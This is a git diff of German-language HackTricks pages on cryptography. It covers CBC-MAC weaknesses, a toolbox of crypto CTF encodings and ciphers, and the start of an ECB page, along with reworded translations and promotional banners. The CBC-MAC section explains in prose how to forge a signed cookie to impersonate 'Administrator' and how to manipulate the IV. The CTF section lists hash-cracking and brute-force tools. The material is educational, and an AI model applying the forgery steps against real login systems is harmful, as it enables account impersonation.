-Diese Praktiken und Mechanismen sind grundlegend für jeden, der sich mit Kryptowährungen beschäftigen möchte und dabei Privatsphäre und Sicherheit priorisiert. +Diese Praktiken und Mechanismen sind grundlegend für jeden, der sich mit Kryptowährungen beschäftigen möchte, während er die Privatsphäre und Sicherheit priorisiert. ## Referenzen @@ -191,18 +190,3 @@ Diese Praktiken und Mechanismen sind grundlegend für jeden, der sich mit Krypto * [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) * [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) * [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) - - -
- -Lernen Sie das Hacken von AWS von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen** möchten, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.** - -
diff --git a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 2debb6321..fa22e490b 100644 --- a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -1,44 +1,45 @@ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
+{% endhint %} # CBC -Wenn das **Cookie** nur der **Benutzername** ist (oder der erste Teil des Cookies der Benutzername ist) und Sie den Benutzernamen "**admin**" vortäuschen möchten. Dann können Sie den Benutzernamen **"bdmin"** erstellen und das **erste Byte** des Cookies per **Brute-Force** angreifen. +Wenn das **Cookie** nur der **Benutzername** ist (oder der erste Teil des Cookies der Benutzername ist) und Sie den Benutzernamen "**admin**" vortäuschen möchten. Dann können Sie den Benutzernamen **"bdmin"** erstellen und das **erste Byte** des Cookies **bruteforcen**. # CBC-MAC -**Cipher Block Chaining Message Authentication Code** (**CBC-MAC**) ist eine in der Kryptographie verwendete Methode. Sie funktioniert, indem eine Nachricht blockweise verschlüsselt wird, wobei die Verschlüsselung jedes Blocks mit dem vorherigen Block verknüpft ist. Dieser Prozess erzeugt eine **Kette von Blöcken**, die sicherstellt, dass selbst eine einzige Bit-Änderung der ursprünglichen Nachricht zu einer unvorhersehbaren Änderung im letzten Block der verschlüsselten Daten führt. Um eine solche Änderung vorzunehmen oder rückgängig zu machen, wird der Verschlüsselungsschlüssel benötigt, um die Sicherheit zu gewährleisten. +**Cipher Block Chaining Message Authentication Code** (**CBC-MAC**) ist eine in der Kryptographie verwendete Methode. Es funktioniert, indem eine Nachricht blockweise verschlüsselt wird, wobei die Verschlüsselung jedes Blocks mit dem vorherigen verknüpft ist. Dieser Prozess erzeugt eine **Kette von Blöcken**, die sicherstellt, dass bereits eine einzige Bitänderung in der Originalnachricht zu einer unvorhersehbaren Änderung im letzten Block der verschlüsselten Daten führt. Um eine solche Änderung vorzunehmen oder rückgängig zu machen, wird der Verschlüsselungsschlüssel benötigt, um die Sicherheit zu gewährleisten. -Um den CBC-MAC der Nachricht m zu berechnen, verschlüsselt man m im CBC-Modus mit einem Initialisierungsvektor von Null und behält den letzten Block bei. Die folgende Abbildung skizziert die Berechnung des CBC-MAC einer Nachricht, die aus Blöcken besteht![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) unter Verwendung eines geheimen Schlüssels k und einer Blockverschlüsselung E: +Um den CBC-MAC der Nachricht m zu berechnen, verschlüsselt man m im CBC-Modus mit einem Initialisierungsvektor von Null und behält den letzten Block bei. Die folgende Abbildung skizziert die Berechnung des CBC-MAC einer Nachricht, die aus Blöcken besteht![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) unter Verwendung eines geheimen Schlüssels k und einer Blockchiffre E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # Schwachstelle Bei CBC-MAC wird normalerweise der **IV-Wert 0** verwendet.\ -Dies ist ein Problem, da 2 bekannte Nachrichten (`m1` und `m2`) unabhängig voneinander 2 Signaturen (`s1` und `s2`) erzeugen. Also: +Dies ist ein Problem, da 2 bekannte Nachrichten (`m1` und `m2`) unabhängig voneinander 2 Signaturen (`s1` und `s2`) generieren werden. Also: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -Dann erzeugt eine aus m1 und m2 konkatenierte Nachricht (m3) 2 Signaturen (s31 und s32): +Dann wird eine Nachricht, die aus m1 und m2 konkateniert ist (m3), 2 Signaturen (s31 und s32) generieren: * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**Die Berechnung ist möglich, ohne den Schlüssel der Verschlüsselung zu kennen.** +**Was möglich ist, ohne den Schlüssel der Verschlüsselung zu kennen.** Stellen Sie sich vor, Sie verschlüsseln den Namen **Administrator** in **8-Byte-Blöcken**: @@ -46,36 +47,37 @@ Stellen Sie sich vor, Sie verschlüsseln den Namen **Administrator** in **8-Byte * `rator\00\00\00` Sie können einen Benutzernamen namens **Administ** (m1) erstellen und die Signatur (s1) abrufen.\ -Dann können Sie einen Benutzernamen erstellen, der das Ergebnis von `rator\00\00\00 XOR s1` ist. Dadurch wird `E(m2 XOR s1 XOR 0)` erzeugt, was s32 ist.\ -Nun können Sie s32 als Signatur des vollständigen Namens **Administrator** verwenden. +Dann können Sie einen Benutzernamen erstellen, der das Ergebnis von `rator\00\00\00 XOR s1` ist. Dies wird `E(m2 XOR s1 XOR 0)` generieren, was s32 ist.\ +Nun können Sie s32 als die Signatur des vollständigen Namens **Administrator** verwenden. ### Zusammenfassung -1. Holen Sie sich die Signatur des Benutzernamens **Administ** (m1), die s1 ist. -2. Holen Sie sich die Signatur des Benutzernamens **rator\x00\x00\x00 XOR s1 XOR 0**, die s32 ist. +1. Holen Sie sich die Signatur des Benutzernamens **Administ** (m1), die s1 ist +2. Holen Sie sich die Signatur des Benutzernamens **rator\x00\x00\x00 XOR s1 XOR 0**, die s32 ist**.** 3. Setzen Sie das Cookie auf s32 und es wird ein gültiges Cookie für den Benutzer **Administrator** sein. -# Angriff auf die Kontrolle des IV +# Angriff zur Steuerung des IV -Wenn Sie den verwendeten IV-Wert kontrollieren können, könnte der Angriff sehr einfach sein.\ -Wenn das Cookie nur der verschlüsselte Benutzername ist, können Sie den Benutzer "**administrator**" vortäuschen, indem Sie den Benutzer "**Administrator**" erstellen und sein Cookie erhalten.\ -Nun, wenn Sie den IV-Wert kontrollieren können, können Sie das erste Byte des IV-Werts ändern, sodass **IV\[0] XOR "A" == IV'\[0] XOR "a"** und das Cookie für den Benutzer **Administrator** neu generieren. Dieses Cookie wird gültig sein, um den Benutzer **administrator** mit dem ursprünglichen **IV** zu vortäuschen. +Wenn Sie den verwendeten IV-Wert steuern können, könnte der Angriff sehr einfach sein.\ +Wenn das Cookie nur der verschlüsselte Benutzername ist, um den Benutzer "**Administrator**" zu vortäuschen, können Sie den Benutzer "**Administrator**" erstellen und sein Cookie erhalten.\ +Nun, wenn Sie den IV-Wert steuern können, können Sie das erste Byte des IV-Werts ändern, sodass **IV\[0] XOR "A" == IV'\[0] XOR "a"** und das Cookie für den Benutzer **Administrator** neu generieren. Dieses Cookie wird gültig sein, um den Benutzer **administrator** mit dem ursprünglichen **IV** zu **vortäuschen**. ## Referenzen Weitere Informationen unter [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
+{% endhint %} diff --git a/crypto-and-stego/crypto-ctfs-tricks.md b/crypto-and-stego/crypto-ctfs-tricks.md index e410bb35f..b62d3b68c 100644 --- a/crypto-and-stego/crypto-ctfs-tricks.md +++ b/crypto-and-stego/crypto-ctfs-tricks.md @@ -1,22 +1,23 @@ # Crypto CTFs Tricks +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositorys senden.
+{% endhint %} ## Online-Hash-Datenbanken -* _**Suchen Sie bei Google**_ +* _**Google es**_ * [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) * [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) * [https://crackstation.net/](https://crackstation.net) @@ -45,7 +46,7 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: ### Substitution-Autosolver * [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -* [https://quipqiup.com/](https://quipqiup.com) - Sehr gut! +* [https://quipqiup.com/](https://quipqiup.com) - Sehr gut ! #### Caesar - ROTx Autosolver @@ -55,7 +56,7 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) -### Base Encodings Autosolver +### Base-Codierungen-Autosolver Überprüfen Sie alle diese Basen mit: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) @@ -103,7 +104,9 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: * `👟👦👣👘👚👘👩👘👚👦👣👘` * **Base122** \[] * `4F ˂r0Xmvc` -* **ATOM-128** +* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] +* `MIc3KiXa+Ihz+lrXMIc3KbCC` +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] * `DmPsv8J7qrlKEoY7` * **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * `kLD8iwKsigSalLJ5` @@ -130,20 +133,14 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Tot: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### Morse - -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Tot: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` * [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) -### UUencoder - -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Tot: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) - ### UUencoder ``` begin 644 webutils_pl @@ -156,8 +153,6 @@ end * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) ### XXEncoder - -XXEncoder ist ein Online-Tool, das verwendet werden kann, um Daten mit dem XXEncoding-Algorithmus zu kodieren. Dieser Algorithmus konvertiert die Daten in eine ASCII-Zeichenkette, die nur aus den Zeichen 'x' und 'u' besteht. Dies kann nützlich sein, um Daten zu verschleiern oder bestimmte Filtermechanismen zu umgehen, die bestimmte Zeichen verbieten. Um XXEncoder zu verwenden, geben Sie einfach die zu kodierenden Daten in das Eingabefeld ein und klicken Sie auf "Encode". Die kodierten Daten werden dann im Ausgabefeld angezeigt. ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 @@ -167,16 +162,6 @@ end * [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) ### YEncoder - -YEncoder ist ein einfacher Text-Encoder, der verwendet wird, um binäre Daten in ASCII-Zeichen zu konvertieren. Es ist ähnlich wie Base64, aber es verwendet eine andere Methode zur Codierung der Daten. - -Der YEncoder verwendet eine 7-Bit-Codierung, bei der jedes Zeichen in 7 Bits codiert wird. Dies ermöglicht die Codierung von 128 verschiedenen Zeichen. Die Codierung erfolgt durch Hinzufügen eines festen Werts zu jedem Zeichen. Dieser feste Wert wird als "Offset" bezeichnet und kann zwischen 42 und 64 liegen. - -Um eine Datei mit YEncoder zu codieren, wird jeder Byte-Wert der Datei in einen 7-Bit-Wert umgewandelt und dann der Offset-Wert addiert. Das Ergebnis wird dann als ASCII-Zeichen dargestellt. Um die Datei zu decodieren, wird der Offset-Wert von jedem ASCII-Zeichen subtrahiert und der ursprüngliche 7-Bit-Wert wiederhergestellt. - -YEncoder wird häufig in CTFs (Capture the Flag) verwendet, um versteckte Informationen in Dateien zu verbergen. Es kann auch verwendet werden, um Dateien über unsichere Kanäle zu übertragen, da die codierten Daten als Text übertragen werden können. - -Um YEncoder zu verwenden, gibt es verschiedene Tools und Skripte, die online verfügbar sind. Diese Tools ermöglichen die Codierung und Decodierung von Dateien mit YEncoder. Es ist wichtig zu beachten, dass YEncoder keine Verschlüsselungsmethode ist und die codierten Daten leicht decodiert werden können, wenn der Offset-Wert bekannt ist. ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk @@ -185,8 +170,6 @@ ryvkryvkryvkryvkryvkryvkryvk * [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) ### BinHex - -BinHex ist ein Dateiformat, das verwendet wird, um binäre Dateien in eine ASCII-Zeichenkette zu konvertieren. Es wurde ursprünglich für die Übertragung von Dateien über E-Mail entwickelt. BinHex verwendet eine Kombination aus hexadezimalen und ASCII-Zeichen, um die binären Daten zu repräsentieren. Dieses Format wird häufig verwendet, um Dateien auf älteren Macintosh-Computern zu speichern und zu übertragen. BinHex-Dateien können mit speziellen Tools decodiert werden, um die ursprünglichen binären Daten wiederherzustellen. ``` (This file must be converted with BinHex 4.0) :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p @@ -195,8 +178,6 @@ BinHex ist ein Dateiformat, das verwendet wird, um binäre Dateien in eine ASCII * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) ### ASCII85 - -ASCII85 ist ein Kodierungsformat, das verwendet wird, um binäre Daten in druckbare ASCII-Zeichen umzuwandeln. Es wird häufig in der Kryptographie und bei der Übertragung von Daten über Textprotokolle verwendet. ASCII85 verwendet 5 Bytes binärer Daten und kodiert sie in 5 ASCII-Zeichen. Dies ermöglicht eine effiziente Darstellung von binären Daten in Textform. Die Decodierung von ASCII85 erfolgt durch Umkehrung des Kodierungsprozesses. Es gibt verschiedene Online-Tools und Bibliotheken, die die Kodierung und Decodierung von ASCII85 unterstützen. ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` @@ -206,7 +187,7 @@ ASCII85 ist ein Kodierungsformat, das verwendet wird, um binäre Daten in druckb ``` drnajapajrna ``` -* [https://www.geocachingtoolbox.com/index.php?lang=de\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=de\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) ### A1Z26 @@ -214,7 +195,7 @@ Buchstaben zu ihrem numerischen Wert ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` -### Affine-Verschlüsselung (Kodierung) +### Affine Cipher Verschlüsselung Buchstabe zu Zahl `(ax+b)%26` (_a_ und _b_ sind die Schlüssel und _x_ ist der Buchstabe) und das Ergebnis zurück zu Buchstabe ``` @@ -222,9 +203,9 @@ krodfdudfrod ``` ### SMS-Code -**Multitap** ersetzt einen Buchstaben durch wiederholte Ziffern, die durch den entsprechenden Tastencode auf einer mobilen [Telefontastatur](https://www.dcode.fr/phone-keypad-cipher) definiert sind (Dieser Modus wird beim Schreiben von SMS verwendet).\ -Beispiel: 2=A, 22=B, 222=C, 3=D...\ -Sie können diesen Code identifizieren, indem Sie **mehrere wiederholte Zahlen** sehen. +**Multitap** ersetzt einen Buchstaben durch wiederholte Ziffern, die durch den entsprechenden Schlüsselcode auf einer mobilen [Telefontastatur](https://www.dcode.fr/phone-keypad-cipher) definiert sind (Dieser Modus wird beim Schreiben von SMS verwendet).\ +Zum Beispiel: 2=A, 22=B, 222=C, 3=D...\ +Sie können diesen Code identifizieren, weil Sie\*\* mehrere wiederholte Zahlen\*\* sehen werden. Sie können diesen Code entschlüsseln unter: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) @@ -241,9 +222,9 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ## Kompression -**Raw Deflate** und **Raw Inflate** (beide finden Sie in Cyberchef) können Daten ohne Header komprimieren und dekomprimieren. +**Raw Deflate** und **Raw Inflate** (beide in Cyberchef zu finden) können Daten ohne Header komprimieren und dekomprimieren. -## Einfache Kryptografie +## Einfache Krypto ### XOR - Autosolver @@ -257,7 +238,7 @@ fgaargaamnlunesuneoa ``` ### Vigenere -Ein Schlüsselwort wird benötigt. +Ein Schlüsselwort wird benötigt ``` wodsyoidrods ``` @@ -279,9 +260,9 @@ Key: ``` * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) -### Samir Secret Sharing +### Samir Geheimnisaufteilung -Ein Geheimnis wird in X Teile aufgeteilt und zur Wiederherstellung benötigt man Y Teile (_Y <=X_). +Ein Geheimnis wird in X Teile aufgeteilt, und um es wiederherzustellen, benötigen Sie Y Teile (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 @@ -294,22 +275,23 @@ Ein Geheimnis wird in X Teile aufgeteilt und zur Wiederherstellung benötigt man * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) -## Werkzeuge +## Tools * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/crypto-and-stego/electronic-code-book-ecb.md b/crypto-and-stego/electronic-code-book-ecb.md index c9df413bf..cbb9af95c 100644 --- a/crypto-and-stego/electronic-code-book-ecb.md +++ b/crypto-and-stego/electronic-code-book-ecb.md @@ -1,34 +1,35 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** 